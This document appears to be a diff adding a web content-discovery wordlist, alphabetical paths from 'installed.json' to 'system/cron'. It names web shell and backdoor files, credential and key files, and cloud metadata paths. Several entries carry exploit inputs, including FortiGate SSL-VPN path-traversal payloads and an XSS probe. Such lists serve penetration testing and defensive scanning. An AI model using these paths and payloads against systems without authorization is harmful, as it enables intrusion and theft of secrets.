+installed.json
+InstalledFiles
+installer
+installer-backup.php
+installer-data.sql
+installer-log.txt
+installer.php
+installer_files/
+install~/
+instance/
+integrationgraph
+Intermediate/
+internal/docs
+invoker/
+invoker/JMXInvokerServlet
+invoker/readonly/JMXInvokerServlet
+invoker/restricted/JMXInvokerServlet
+io.swf
+iOSInjectionProject/
+ipch/
+irc-macadmin/
+irequest/
+isadmin
+isadmin.php
+ispmgr/
+iwa/authenticated.aspx
+iwa/iwa_test.aspx
+j2ee/servlet/SnoopServlet
+jacoco/
+Jakefile
+javascripts/bundles
+javax.faces.resource.../
+javax.faces.resource.../WEB-INF/web.xml.jsf
+jboss-net/
+jboss-net//happyaxis.jsp
+jboss-net/happyaxis.jsp
+jboss/server/all/deploy/project.ext
+jboss/server/all/log/
+jboss/server/default/deploy/project.ext
+jboss/server/default/log/
+jboss/server/minimal/deploy/project.ext
+jbossws/services
+jbpm-console/app/tasks.jsf
+jdbc
+jdkstatus
+jenkins/
+Jenkinsfile
+jira/
+jk-status
+jk/
+jkmanager
+jkmanager-auth
+jkstatus
+jkstatus-auth
+jmx-console
+jmx-console/
+jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
+jo.php
+jolokia
+jolokia/
+jolokia/list
+joomla.rar
+joomla.xml
+joomla.zip
+joomla/
+joomla/administrator
+js/
+js/elfinder/elfinder.php
+js/envConfig.js
+js/FCKeditor
+js/prepod.js
+js/prod.js
+js/qa.js
+js/routing
+js/swfupload/swfupload.swf
+js/swfupload/swfupload_f9.swf
+js/tiny_mce/
+js/tinymce/
+js/yui/uploader/assets/uploader.swf
+js/ZeroClipboard.swf
+js/ZeroClipboard10.swf
+jscripts/
+jscripts/tiny_mce/
+jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
+jscripts/tinymce/
+jsp-examples/
+jsp-reverse.jsp
+jsp/viewer/snoop.jsp
+jspm_packages/
+jssresource/
+juju/
+junit/
+kafka/
+kairosdb/
+karma.conf.js
+kcfinder/
+kcfinder/browse.php
+key.pem
+keys.json
+kibana/
+killer.php
+known_tokens.csv
+kpanel/
+krb.log
+krblog.txt
+kube-apiserver.log
+kube-controller-manager.log
+kube-proxy.log
+kube-scheduler.log
+kube/
+kuber/
+kubernetes/
+l0gs.txt
+L3b.php
+lander.logs
+latest/meta-data/hostname
+latest/user-data
+layouts/
+ldap.prop
+ldap.prop.sample
+ldap/
+letmein
+letmein.php
+letmein/
+level
+lfm.php
+lg/
+lg/lg.conf
+lia.cache
+lib-cov
+lib/
+lib/bundler/man/
+lib/fckeditor/
+lib/flex/uploader/.actionScriptProperties
+lib/flex/uploader/.flexProperties
+lib/flex/uploader/.project
+lib/flex/uploader/.settings
+lib/flex/varien/.actionScriptProperties
+lib/flex/varien/.flexLibProperties
+lib/flex/varien/.project
+lib/flex/varien/.settings
+lib/tiny_mce/
+lib/tinymce/
+lib64/
+libraries/
+libraries/phpmailer/
+libraries/tiny_mce/
+libraries/tinymce/
+librepag.log
+LICENSE
+license
+LICENSE.md
+license.md
+license.php
+LICENSE.txt
+license.txt
+license_key.php
+liferay.log
+liferay/
+lighttpd.access.log
+lighttpd.error.log
+lilo.conf
+lindex.php
+linkhub/
+linkhub/linkhub.log
+linktous.html
+linusadmin-phpinfo.php
+liquibase
+list_emails
+listener.log
+lists/
+lists/config
+LiveUser_Admin/
+lk/
+load.php
+local.config.rb
+local.properties
+local.xml.additional
+local.xml.template
+local/
+local/composer.lock
+local/composer.phar
+local_bd_new.txt
+local_bd_old.txt
+local_conf.php.bac
+local_conf.php.bak
+local_settings.py
+localhost.sql
+localsettings.php.bak
+localsettings.php.dist
+localsettings.php.old
+localsettings.php.save
+localsettings.php.swp
+localsettings.php.txt
+localsettings.php~
+log
+log-in
+log-in.php
+log-in/
+log.htm
+log.html
+log.json
+log.mdb
+log.php
+log.sqlite
+log.txt
+log/
+log/access.log
+log/access_log
+log/authorizenet.log
+log/development.log
+log/error.log
+log/error_log
+log/exception.log
+log/librepag.log
+log/log.log
+log/log.txt
+log/old
+log/payment.log
+log/payment_authorizenet.log
+log/payment_paypal_express.log
+log/production.log
+log/server.log
+log/test.log
+log/www-error.log
+log_1.txt
+log_errors.txt
+log_in
+log_in.php
+log_in/
+logexpcus.txt
+logfile
+logfile.txt
+logfiles
+loggers
+loggers.json
+loggers/
+logi.php
+login
+login-gulp.js
+login-redirect/
+login-us/
+login.asp
+login.cgi
+login.htm
+login.html
+login.json
+login.php
+login/
+login/admin/admin.asp
+login/index
+login/login
+login/super
+login1
+login1/
+login_admi
+login_admin
+login_admin/
+login_db/
+login_ou.php
+login_out
+login_out/
+login_use.php
+login_user
+loginerror/
+loginflat/
+loginok/
+logins.txt
+loginsave/
+loginsupe.php
+loginsuper
+loginsuper/
+logo_sysadmin/
+logou.php
+logout
+logout.asp
+logout/
+logs
+logs.htm
+logs.html
+logs.mdb
+logs.pl
+logs.sqlite
+logs.txt
+Logs/
+logs/
+logs/access.log
+logs/access_log
+logs/error.log
+logs/error_log
+logs/liferay.log
+logs/mail.log
+logs/proxy_access_ssl_log
+logs/proxy_error_log
+logs/wsadmin.traceout
+logs/www-error.log
+logs_backup/
+logs_console/
+logstash/
+lol.php
+Lotus_Domino_Admin/
+ltmain.sh
+luac.out
+m4/libtool.m4
+m4/ltoptions.m4
+m4/ltsugar.m4
+m4/ltversion.m4
+m4/lt~obsolete.m4
+macadmin/
+madspot.php
+madspotshell.php
+magic.default
+magmi/
+magmi/conf/magmi.ini
+mail
+mail.log
+mail/
+Mail/smtp/Admin/smadv.asp
+mailer/.env
+mailman/
+mailman/listinfo
+main.env
+main.mdb
+main.zip
+main/
+main/login
+maint/
+MAINTAINERS.txt
+maintenance.flag
+maintenance.flag.bak
+maintenance.flag2
+maintenance.html
+maintenance.php
+maintenance/
+maintenance/test.php
+maintenance/test2.php
+Makefile
+Makefile.in
+Makefile.old
+manage
+manage.php
+manage.py
+manage/
+manage/admin.asp
+manage/login.asp
+manage_index
+management
+management.php
+management/
+management/configprops
+management/env
+manager
+manager.php
+manager/
+manager/admin.asp
+manager/html
+manager/login
+manager/login.asp
+manager/status/all
+MANIFEST
+MANIFEST.bak
+MANIFEST.MF
+manifest.mf
+manifest.yml
+manifest/cache/
+manifest/logs/
+manifest/tmp/
+manuallogin/
+mappings
+mappings.json
+master.passwd
+master.tar
+master.tar.bz2
+master.tar.gz
+master.zip
+master/
+master/portquotes_new/admin.log
+mattermost/
+maven/
+mbox
+mcollective/
+mcx/
+mcx/mcxservice.svc
+mdate-sh
+media.tar
+media.tar.bz2
+media.tar.gz
+media.zip
+media/
+media/export-criteo.xml
+meet/
+meeting/
+member
+member.php
+member/
+member/admin.asp
+member/login.asp
+memberadmin
+memberadmin.php
+memberadmin/
+memberlist
+members
+members.csv
+members.log
+members.mdb
+members.php
+members.sql
+members.sql.gz
+members.sqlite
+members.txt
+members.xls
+members/
+membersonly
+memcached/
+memlogin/
+mercurial.ini
+mercurial/
+Mercury.modules
+Mercury/
+mesos/
+META-INF/
+META-INF/context.xml
+META.json
+META.yml
+meta_login/
+metadata.rb
+metric/
+metric_tracking
+metric_tracking.json
+metrics
+metrics.json
+metrics/
+microsoft-server-activesync/
+mics/
+mics/mics.html
+mifs/
+mifs/user/index.html
+migration.log
+mimosa-config.coffee
+mimosa-config.js
+mirror.cfg
+mirror/
+misc
+missing
+mkdocs.yml
+Mkfile.old
+moadmin.php
+moadmin/
+mock/
+modelsearch/
+modelsearch/admin.html
+modelsearch/admin.php
+modelsearch/index.html
+modelsearch/index.php
+modelsearch/login
+modelsearch/login.html
+modelsearch/login.php
+moderator
+moderator.html
+moderator.php
+moderator/
+moderator/admin
+moderator/admin.html
+moderator/admin.php
+moderator/login
+moderator/login.html
+moderator/login.php
+modern.json
+modern.jsonp
+Module.symvers
+module.zip
+modules.order
+modules/
+modules/admin/
+mongo/
+mongodb/
+monit/
+monitor
+monitor/
+monitoring
+monitoring/
+moving.page
+mrtg.cfg
+msg/
+msg_gen/
+msmtp_default.log
+msql/
+mssql/
+mt-check.cgi
+munin/
+muracms.esproj
+mw-config/
+mx.php
+my.7z
+my.rar
+my.tar
+my.tar.bz2
+my.tar.gz
+my.zip
+myadm/
+MyAdmin/
+myadmin/
+myadmin/index.php
+MyAdmin/scripts/setup.php
+myadmin/scripts/setup.php
+myadmin2/index.php
+myadminscripts/
+myadminscripts/setup.php
+myconf.env
+myserver.key
+mysql-admin/
+mysql-admin/index.php
+mysql.err
+mysql.log
+mysql.php
+mysql.sql
+mysql.tar
+mysql.tar.bz2
+mysql.tar.gz
+mysql.zip
+mysql/
+mysql/admin/
+mysql/db/
+mysql/dbadmin/
+mysql/index.php
+mysql/mysqlmanager/
+mysql/pMA/
+mysql/pma/
+mysql/scripts/setup.php
+mysql/sqlmanager/
+mysql/web/
+mysql_debug.sql
+mysqladmin/
+mysqladmin/index.php
+mysqladmin/scripts/setup.php
+mysqldump.sql
+mysqldumper/
+mysqlitedb.db
+mysqlmanager/
+naginator/
+nagios/
+nano.save
+native_stderr.log
+native_stdout.log
+navSiteAdmin/
+nb-configuration.xml
+nbactions.xml
+nbproject/
+nbproject/private/private.properties
+nbproject/private/private.xml
+nbproject/project.properties
+nbproject/project.xml
+netdata/
+New%20Folder
+New%20folder%20(2)
+new.7z
+new.php
+new.rar
+new.tar
+new.tar.bz2
+new.tar.gz
+new.zip
+newbbs/
+newbbs/login
+newsadmin/
+nextcloud/
+nfs/
+ng-cli-backup.json
+nginx-access.log
+nginx-error.log
+nginx-ssl.access.log
+nginx-ssl.error.log
+nginx-status/
+nginx.conf
+nginx_status
+nginx_template.conf
+ngx_pagespeed_beacon/
+nia.cache
+nimcache/
+nlia.cache
+node-role.kubernetes.io
+node_modules
+node_modules/
+nohup.out
+nosetests.xml
+npm-debug.log
+npm-shrinkwrap.json
+nra.cache
+nst.php
+nstview.php
+nsw/
+nsw/admin/login.php
+nwp-content/
+nwp-content/plugins/disqus-comment-system/disqus.php
+nytprof.out
+oab/
+obj/
+ocp.php
+ocsp/
+odbc
+Office/
+Office/graph.php
+olap/
+old
+old.7z
+old.htaccess
+old.htpasswd
+old.rar
+old.tar
+old.tar.bz2
+old.tar.gz
+old.zip
+old/
+old_files
+old_site/
+oldfiles
+ona
+opa-debug-js
+open-flash-chart.swf?get-data=xss
+OpenCover/
+openshift/
+openstack/
+opentsdb/
+openvpn.ovpn
+openvpnadmin/
+operador/
+operator/
+oprocmgr-service
+oprocmgr-status
+ops/
+oracle
+order.log
+order.txt
+order_add_log.txt
+order_log
+orders
+orders.csv
+orders.log
+orders.sql
+orders.sql.gz
+orders.txt
+orders.xls
+orders_log
+orleans.codegen.cs
+ospfd.conf
+osticket/
+otrs/
+out.txt
+out/
+output
+output-build.txt
+output/
+OWA/
+owa/
+owncloud/
+p.php
+p/
+p/m/a/
+package-cache
+package-lock.json
+package.json
+Package.StoreAssociation.xml
+package/
+packer_cache/
+pagerduty/
+pages/
+pages/admin/
+pages/admin/admin-login
+pages/admin/admin-login.html
+pages/admin/admin-login.php
+painel/
+painel/config/config.php.example
+paket-files/
+panel
+panel-administracion/
+panel-administracion/admin.html
+panel-administracion/admin.php
+panel-administracion/index.html
+panel-administracion/index.php
+panel-administracion/login
+panel-administracion/login.html
+panel-administracion/login.php
+panel.php
+panel/
+params.txt
+parts/
+pass
+pass.dat
+pass.txt
+passes.txt
+passlist
+passlist.txt
+passwd
+passwd.adjunct
+passwd.bak
+passwd.txt
+Password
+password
+password.html
+password.log
+password.mdb
+password.sqlite
+password.txt
+passwords
+passwords.html
+passwords.mdb
+passwords.sqlite
+passwords.txt
+path/
+path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+pause
+pause.json
+payment.log
+payment_authorizenet.log
+payment_paypal_express.log
+pbmadmin/
+pbx/
+pentaho/
+perl-reverse-shell.pl
+perlcmd.cgi
+persistentchat/
+personal
+personal.mdb
+personal.sqlite
+pg_hba.conf
+pgadmin
+pgadmin.log
+pgadmin/
+PharoDebug.log
+phinx.yml
+phoenix
+phoneconferencing/
+php
+php-backdoor.php
+php-cgi.core
+php-cli.ini
+php-cs-fixer.phar
+php-error.log
+php-error.txt
+php-errors.log
+php-errors.txt
+php-findsock-shell.php
+php-fpm/
+php-fpm/error.log
+php-fpm/www-error.log
+php-info.php
+php-my-admin/
+php-myadmin/
+php-reverse-shell.php
+php-tiny-shell.php
+php.core
+php.error.log
+php.ini
+php.ini-orig.txt
+php.ini.sample
+php.ini_
+php.ini~
+php.lnk
+php.log
+php.php
+php/
+php/dev/
+php/php.cgi
+php4.ini
+php5.fcgi
+php5.ini
+php_cli_errors.log
+php_error.log
+php_error_log
+php_errorlog
+php_errors.log
+phpadmin/
+phpadmin/index.php
+phpadminmy/
+phperrors.log
+phpFileManager.php
+phpFileManager/
+phpfm-1.6.1/
+phpfm-1.7.1/
+phpfm-1.7.2/
+phpfm-1.7.3/
+phpfm-1.7.4/
+phpfm-1.7.5/
+phpfm-1.7.6/
+phpfm-1.7.7/
+phpfm-1.7.8/
+phpfm-1.7/
+phpfm.php
+phpfm/
+phpinfo
+phpinfo.php
+phpinfo.php3
+phpinfo.php4
+phpinfo.php5
+phpinfos.php
+phpini.bak
+phpldapadmin
+phpldapadmin/
+phpliteadmin%202.php
+phpliteadmin.php
+phpLiteAdmin/
+phpLiteAdmin_/
+phpm/
+phpma/
+phpma/index.php
+phpmailer
+phpmanager/
+phpmem/
+phpmemcachedadmin/
+phpminiadmin.php
+phpminiadmin/
+phpMoAdmin/
+phpmoadmin/
+phpmy-admin/
+phpMy/
+phpmy/
+phpMyA/
+phpmyad-sys/
+phpmyad/
+phpMyAdmi/
+phpMyAdmin-2.10.0/
+phpMyAdmin-2.10.1/
+phpMyAdmin-2.10.2/
+phpMyAdmin-2.10.3/
+phpMyAdmin-2.11.0/
+phpMyAdmin-2.11.1/
+phpMyAdmin-2.11.10/
+phpMyAdmin-2.11.2/
+phpMyAdmin-2.11.3/
+phpMyAdmin-2.11.4/
+phpMyAdmin-2.11.5.1-all-languages/
+phpMyAdmin-2.11.5/
+phpMyAdmin-2.11.6-all-languages/
+phpMyAdmin-2.11.6/
+phpMyAdmin-2.11.7.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.7.1-all-languages/
+phpMyAdmin-2.11.7/
+phpMyAdmin-2.11.8.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.8.1-all-languages/
+phpMyAdmin-2.11.8.1/
+phpMyAdmin-2.11.9/
+phpMyAdmin-2.2.3/
+phpMyAdmin-2.2.6/
+phpMyAdmin-2.5.1/
+phpMyAdmin-2.5.4/
+phpMyAdmin-2.5.5-pl1/
+phpMyAdmin-2.5.5-rc1/
+phpMyAdmin-2.5.5-rc2/
+phpMyAdmin-2.5.5/
+phpMyAdmin-2.5.6-rc1/
+phpMyAdmin-2.5.6-rc2/
+phpMyAdmin-2.5.6/
+phpMyAdmin-2.5.7-pl1/
+phpMyAdmin-2.5.7/
+phpMyAdmin-2.6.0-alpha/
+phpMyAdmin-2.6.0-alpha2/
+phpMyAdmin-2.6.0-beta1/
+phpMyAdmin-2.6.0-beta2/
+phpMyAdmin-2.6.0-pl1/
+phpMyAdmin-2.6.0-pl2/
+phpMyAdmin-2.6.0-pl3/
+phpMyAdmin-2.6.0-rc1/
+phpMyAdmin-2.6.0-rc2/
+phpMyAdmin-2.6.0-rc3/
+phpMyAdmin-2.6.0/
+phpMyAdmin-2.6.1-pl1/
+phpMyAdmin-2.6.1-pl2/
+phpMyAdmin-2.6.1-pl3/
+phpMyAdmin-2.6.1-rc1/
+phpMyAdmin-2.6.1-rc2/
+phpMyAdmin-2.6.1/
+phpMyAdmin-2.6.2-beta1/
+phpMyAdmin-2.6.2-pl1/
+phpMyAdmin-2.6.2-rc1/
+phpMyAdmin-2.6.2/
+phpMyAdmin-2.6.3-pl1/
+phpMyAdmin-2.6.3-rc1/
+phpMyAdmin-2.6.3/
+phpMyAdmin-2.6.4-pl1/
+phpMyAdmin-2.6.4-pl2/
+phpMyAdmin-2.6.4-pl3/
+phpMyAdmin-2.6.4-pl4/
+phpMyAdmin-2.6.4-rc1/
+phpMyAdmin-2.6.4/
+phpMyAdmin-2.7.0-beta1/
+phpMyAdmin-2.7.0-pl1/
+phpMyAdmin-2.7.0-pl2/
+phpMyAdmin-2.7.0-rc1/
+phpMyAdmin-2.7.0/
+phpMyAdmin-2.8.0-beta1/
+phpMyAdmin-2.8.0-rc1/
+phpMyAdmin-2.8.0-rc2/
+phpMyAdmin-2.8.0.1/
+phpMyAdmin-2.8.0.2/
+phpMyAdmin-2.8.0.3/
+phpMyAdmin-2.8.0.4/
+phpMyAdmin-2.8.0/
+phpMyAdmin-2.8.1-rc1/
+phpMyAdmin-2.8.1/
+phpMyAdmin-2.8.2/
+phpMyAdmin-2/
+phpMyAdmin-3.0.0/
+phpMyAdmin-3.0.1/
+phpMyAdmin-3.1.0/
+phpMyAdmin-3.1.1/
+phpMyAdmin-3.1.2/
+phpMyAdmin-3.1.3/
+phpMyAdmin-3.1.4/
+phpMyAdmin-3.1.5/
+phpMyAdmin-3.2.0/
+phpMyAdmin-3.2.1/
+phpMyAdmin-3.2.2/
+phpMyAdmin-3.2.3/
+phpMyAdmin-3.2.4/
+phpMyAdmin-3.2.5/
+phpMyAdmin-3.3.0/
+phpMyAdmin-3.3.1/
+phpMyAdmin-3.3.2-rc1/
+phpMyAdmin-3.3.2/
+phpMyAdmin-3.3.3-rc1/
+phpMyAdmin-3.3.3/
+phpMyAdmin-3.3.4-rc1/
+phpMyAdmin-3.3.4/
+phpMyAdmin-3/
+phpMyAdmin-4/
+phpmyadmin-old/index.php
+phpMyAdmin.old/index.php
+phpMyAdmin/
+phpMyadmin/
+phpmyAdmin/
+phpmyadmin/
+phpMyAdmin/index.php
+phpmyadmin/index.php
+phpMyAdmin/phpMyAdmin/index.php
+phpmyadmin/phpmyadmin/index.php
+phpMyAdmin/scripts/setup.php
+phpmyadmin/scripts/setup.php
+phpMyAdmin0/
+phpmyadmin0/
+phpmyadmin0/index.php
+phpMyAdmin1/
+phpmyadmin1/
+phpmyadmin1/index.php
+phpMyAdmin2/
+phpmyadmin2/
+phpmyadmin2/index.php
+phpmyadmin2011/
+phpmyadmin2012/
+phpmyadmin2013/
+phpmyadmin2014/
+phpmyadmin2015/
+phpmyadmin2016/
+phpmyadmin2017/
+phpmyadmin2018/
+phpMyAdmin3/
+phpmyadmin3/
+phpMyAdmin4/
+phpmyadmin4/
+phpMyadmin_bak/index.php
+phpMyAdminBackup/
+phpMyAdminold/index.php
+phpMyAds/
+phppgadmin
+phpPgAdmin/
+phppgadmin/
+phppma/
+phpRedisAdmin/
+phpredmin/
+phproad/
+phpsecinfo/
+phpspec.yml
+phpSQLiteAdmin/
+phpstudy.php
+phpsysinfo/
+phptest.php
+phpThumb.php
+phpThumb/
+phpunit.phar
+phpunit.xml
+phpunit.xml.dist
+phymyadmin/
+pi.php
+pi.php5
+pids
+pinfo.php
+pip-delete-this-directory.txt
+pip-log.txt
+piwigo/
+piwigo/extensions/UserCollections/template/ZeroClipboard.swf
+pkg/
+placeholder_one
+placeholder_two
+planning/cfg
+planning/docs
+planning/src
+platz_login/
+play-cache
+play-stash
+player.swf
+playground
+playground.xcworkspace
+plugin.xml
+plugins
+plugins.log
+plugins/
+plugins/editors/fckeditor
+plugins/fckeditor
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
+plugins/tiny_mce/
+plugins/tinymce/
+plugins/upload.php
+plugins/web.config
+plupload
+pm_to_blib
+pma-old/index.php
+PMA/
+pma/
+PMA/index.php
+pma/index.php
+pma/scripts/setup.php
+PMA2/index.php
+PMA2005/
+pma2005/
+PMA2009/
+pma2009/
+PMA2011/
+pma2011/
+PMA2012/
+pma2012/
+PMA2013/
+pma2013/
+PMA2014/
+pma2014/
+PMA2015/
+pma2015/
+PMA2016/
+pma2016/
+PMA2017/
+pma2017/
+PMA2018/
+pma2018/
+pma4/
+pmadmin/
+pmamy/index.php
+pmamy2/index.php
+pmd/index.php
+pmyadmin/
+pom.xml
+pom.xml.asc
+pom.xml.next
+pom.xml.releaseBackup
+pom.xml.tag
+pom.xml.versionsBackup
+portal/
+postgresql.conf
+power_user/
+powershell/
+pprof/
+printenv
+printenv.tmp
+priv8.php
+private.key
+private.mdb
+private.sqlite
+privatekey.key
+processlogin
+processlogin.php
+Procfile
+Procfile.dev
+Procfile.offline
+product.json
+productcockpit/
+production.log
+profiles
+profiles.xml
+program/
+proguard/
+project-admins/
+project.fragment.lock.json
+project.lock.json
+project.xml
+project/project
+project/target
+prometheus
+prometheus/
+prometheus/targets
+propel.ini
+propel.json
+protected/data/
+protected/runtime/
+providers.json
+proxy.pac
+proxy.stream?origin=https://google.com
+proxy/
+proxy_config.json
+prv/
+PSUser/
+public
+public..
+public/
+public/hot
+public/storage
+public/system
+public_html.zip
+public_html/
+publication_list.xml
+publish/
+PublishScripts/
+pubspec.lock
+puppet/
+pureadmin/
+putty.reg
+pw.txt
+pwd.db
+pws.txt
+py-compile
+qa/
+qq.php
+qql/
+qsd-php-backdoor.php
+query.log
+QuickLook/
+quikstore.cfg
+r.php
+r00t.php
+r57.php
+r57eng.php
+r57shell.php
+r58.php
+r99.php
+rabbitmq/
+radius/
+radmind-1/
+radmind/
+rails/info/properties
+Rakefile
+raygun/
+rcf/
+rcjakar/
+rcjakar/admin/login.php
+rcLogin/
+rdoc/
+reach/sip.svc
+Read
+Read%20Me.txt
+read.me
+Read_Me.txt
+README
+ReadMe
+Readme
+readme
+README.htm
+README.HTML
+README.html
+ReadMe.html
+Readme.html
+readme.html
+README.MD
+README.md
+ReadMe.md
+Readme.md
+readme.md
+README.mkd
+readme.mkd
+readme.php
+README.TXT
+README.txt
+ReadMe.txt
+Readme.txt
+readme.txt
+recentservers.xml
+redis/
+redmine/
+refresh
+refresh.json
+register.php
+registration/
+registry/
+rel/example_project
+release.properties
+RELEASE_NOTES.txt
+relogin
+relogin.htm
+relogin.html
+relogin.php
+remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd
+remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
+repo/
+request.log
+requesthandler/
+requesthandlerext/
+requirements.txt
+rerun.txt
+reseller
+resources.xml
+resources/
+resources/.arch-internal-preview.css
+resources/fckeditor
+resources/sass/.sass-cache/
+resources/tmp/
+rest-api/
+rest-auth/
+rest/
+rest/v1
+rest/v3/doc
+restart
+restart.json
+restore.php
+restricted
+resume
+resume.json
+revision.inc
+revision.txt
+rgs/
+rgsclients/
+robot.txt
+robots.txt
+robots.txt.dist
+root/
+RootCA.crt
+roundcube/index.php
+rpc/
+rpcwithcert/
+rsconnect/
+rst.php
+rudder/
+run.sh
+run.zip
+RushSite.xml
+s.php
+sa.php
+sa2.php
+sales.csv
+sales.log
+sales.sql
+sales.sql.gz
+sales.txt
+sales.xls
+salesforce.schema
+saltstack/
+sample.txt
+sample.txt~
+Saved/
+sbt/
+scalyr/
+scheduledtasks
+scheduler/
+schema.sql
+schema.yml
+script.zip
+script/
+script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+scripts
+scripts.zip
+scripts/
+scripts/ckeditor/ckfinder/core/connector/asp/connector.asp
+scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx
+scripts/ckeditor/ckfinder/core/connector/php/connector.php
+scripts/setup.php
+sdb.php
+sdist/
+searchreplacedb2.php
+searchreplacedb2cli.php
+secret
+Secret/
+secret/
+secrets.env
+secrets/
+secring.bak
+secring.pgp
+secring.skr
+secure/
+security/
+selenium/
+sendgrid.env
+sensu/
+sentemails.log
+sentry/
+serv-u.ini
+Server
+server-info
+server-status
+server-status/
+server.cert
+server.cfg
+server.config.yaml
+server.js
+server.key
+server.log
+server.ovpn
+Server.php
+server.pid
+server.xml
+Server/
+server/config.json
+server/server.js
+server_admin_small/
+server_stats
+ServerAdministrator/
+ServerList.cfg
+ServerList.xml
+servers.xml
+serverStatus.log
+service-registry/instance-status
+service-registry/instance-status.json
+service.asmx
+service.yaml
+serviceaccount.crt
+ServiceFabricBackup/
+services
+services/
+services/config/databases.yml
+servlet/
+servlet/%C0%AE%C0%AE%C0%AF
+servlet/DMSDump
+servlet/Oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/Oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/SnoopServlet
+servlet/Spy
+session/
+sessions
+sessions/
+settings.php
+settings.php.bak
+settings.php.dist
+settings.php.old
+settings.php.save
+settings.php.swp
+settings.php.txt
+settings.php~
+settings.py
+settings.xml
+settings/
+Settings/ui.plist
+setup
+setup.data
+setup.log
+setup.php
+setup.sql
+setup/
+sftp-config.json
+Sh3ll.php
+sheep.php
+shell.php
+shell.sh
+shell/
+shellz.php
+shopdb/
+show
+showcode.asp
+showlogin/
+shutdown
+sidekiq
+sidekiq_monitor
+sign-in
+sign-in/
+sign_in
+sign_in/
+signin
+signin.php
+signin/
+signup.action
+simple-backdoor.php
+simpleLogin/
+sip/
+site
+site.rar
+site.sql
+site.tar
+site.tar.bz2
+site.tar.gz
+site.txt
+site.zip
+site/
+site/common.xml
+site_admin
+siteadmin
+siteadmin.php
+siteadmin/
+siteadmin/index.php
+siteadmin/login.html
+siteadmin/login.php
+sitemanager.xml
+sites.ini
+sites.xml
+sites/all/libraries/README.txt
+sites/all/modules/README.txt
+sites/all/themes/README.txt
+sites/default/private/files/backup_migrate/scheduled/test.txt
+sites/example.sites.php
+sites/README.txt
+sized/
+slapd.conf
+smblogin/
+snoop.jsp
+snort/
+soap/
+soap/servlet/soaprouter
+soap/servlet/Spy
+soapdocs/
+soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+soapserver/
+sonar/
+sonarcube/
+sonarqube/
+source
+source.php
+source.zip
+source/
+source/inspector.html
+source_gen
+source_gen.caches
+SourceArt/
+spamlog.log
+spec/
+spec/examples.txt
+spec/lib/database.yml
+spec/lib/settings.local.yml
+spec/reports/
+spec/tmp
+splunk/
+spwd.db
+spy.aspx
+sql-admin/
+sql.inc
+sql.php
+sql.sql
+sql.tar
+sql.tar.bz2
+sql.tar.gz
+sql.tgz
+sql.txt
+sql.zip
+sql/
+sql/index.php
+sql/myadmin/
+sql/php-myadmin/
+sql/phpmanager/
+sql/phpmy-admin/
+sql/phpMyAdmin/
+sql/phpMyAdmin2/
+sql/phpmyadmin2/
+sql/sql-admin/
+sql/sql/
+sql/sqladmin/
+sql/sqlweb/
+sql/webadmin/
+sql/webdb/
+sql/websql/
+sql_dumps
+sql_error.log
+sqladm
+sqladmin
+sqladmin/
+sqlbuddy
+sqlbuddy/
+sqlbuddy/login.php
+sqldump.sql
+sqlmanager/
+sqlmigrate.php
+sqlnet.log
+sqlweb/
+SQLyogTunnel.php
+SqueakDebug.log
+squid-reports/
+squid/
+squid3_log/
+src/
+src/app.js
+src/index.js
+src/server.js
+srv/
+srv_gen/
+ss_vms_admin_sm/
+ssh/
+sshadmin/
+ssl/
+st.php
+stackstorm/
+stacktrace.log
+staff/
+stage_create_service.sh
+stage_create_service_dev.sh
+stage_create_service_prod.sh
+stage_deploy.sh
+stage_deploy_dev.sh
+stage_deploy_prod.sh
+stamp-h1
+staradmin/
+start.html
+start.sh
+startServer.log
+startup.cfg
+startup.sh
+stas/
+stash/
+stat/
+static..
+static/dump.sql
+statistics
+statistics/
+stats
+stats/
+statsd/
+status.php
+status.xsl
+status/
+status?full=true
+statusicon/
+storage/
+storage/logs/laravel.log
+store.tgz
+StreamingStatistics
+stronghold-info
+stronghold-status
+stssys.htm
+StyleCopReport.xml
+stylesheets/bundles
+sub-login/
+subversion/
+sugarcrm.log
+supe.php
+super
+Super-Admin/
+super.php
+super1
+super1/
+super_inde.php
+super_index
+super_logi.php
+super_login
+superma.php
+superman
+superman/
+supermanage.php
+supermanager
+superuse.php
+superuser
+superuser.php
+superuser/
+supervise/
+supervise/Logi.php
+supervise/Login
+supervisor/
+supervisord/
+support/
+support_login/
+surgemail/
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf
+suspended.page
+svn.revision
+SVN/
+svn/
+svn/wc.db
+swagger
+swagger-resources
+swagger-ui
+swagger-ui.html
+swagger.json
+swagger.yaml
+swagger/index.html
+swagger/swagger-ui.htm
+swagger/swagger-ui.html
+swagger/ui
+swagger/v1/swagger.json
+swaggerui
+swfobject.js
+swfupload
+swfupload.swf
+sxd/
+sxd/backup/
+sxdpro/
+Sym.php
+sYm.php
+sym/
+sym/root/home/
+symfony/
+symfony/apps/frontend/config/routing.yml
+symfony/apps/frontend/config/settings.yml
+symfony/config/databases.yml
+Symlink.php
+Symlink.pl
+symphony/
+symphony/apps/frontend/config/app.yml
+symphony/apps/frontend/config/databases.yml
+symphony/config/app.yml
+symphony/config/databases.yml
+syncNode.log
+sypex.php
+sypexdumper.php
+SypexDumper_2011/
+sys-admin/
+sys/pprof
+sysadm
+sysadm.php
+sysadm/
+sysadmin
+sysadmin.php
+SysAdmin/
+sysadmin/
+SysAdmin2/
+sysadmins
+sysadmins/
+sysbackup
+sysinfo.txt
+syslog/
+system-administration/
+system.log
+system.zip
+system/
+system/cache/
+system/cron/cron.txt
